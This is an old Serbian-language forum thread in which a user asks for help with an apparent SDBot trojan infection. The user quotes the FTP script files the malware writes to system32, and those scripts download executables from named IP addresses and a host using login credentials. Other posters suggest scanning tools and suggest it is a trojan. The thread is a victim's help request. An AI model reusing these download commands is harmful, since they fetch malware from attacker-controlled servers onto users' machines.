[ zloboleon @ 28.12.2005. 21:59 ] @
evo jedno pitanjce
naime koristim processguard da bih se zastitio od ovih hardcore trojana ali pored nekih ispitivanje izgleda da je ostao neki njihov deo
kad se konektujem na net svchost.exe pokrece cmd.exe sa nekim komandama i stvara file imena i ili qaz u system32 i otvara ftp.exe ili tftp.exe ucitavajuci komandame iz ovih file-ova.
sadrzaj file i je promenlji ali uglavno je slican ovome

open 195.252.84.90 19736
user 1 1
get eraseme_43238.exe
quit

ili

open 195.252.126.254 1331
user 1 1
get eraseme_53107.exe
quit

>file qaz

open xman.acid-burn.info 21
user ftplogx
ftpP4ssX
binary
get myhost.exe
bye

ako neko ima neko objasnjenje neka kaze!
bice imagea
poz
[ AleksandarNS @ 03.01.2006. 20:48 ] @
Na kojoj tačno lokaciji se nalazi taj svchost.exe?

Definitivno nešto nije kako treba. Verovatno je trojanac u pitanju.
Antivirusi? Spybot? Adaware?
[ zloboleon @ 09.01.2006. 14:59 ] @
%systemroot%\system32
ma nista samo stinger prijavljuje onaj "i" file kao sdbot-a ali ne dezinfekuje a av se oglashava kad skine neki file erase_me********.exe
shiri se ko ludo evo posle formata mi opet uleteo preko irc-a

[Ovu poruku je menjao zloboleon dana 09.01.2006. u 16:02 GMT+1]
[ IcyImpact @ 09.01.2006. 17:27 ] @
Ajde onda budi oprezniji sljedeći put.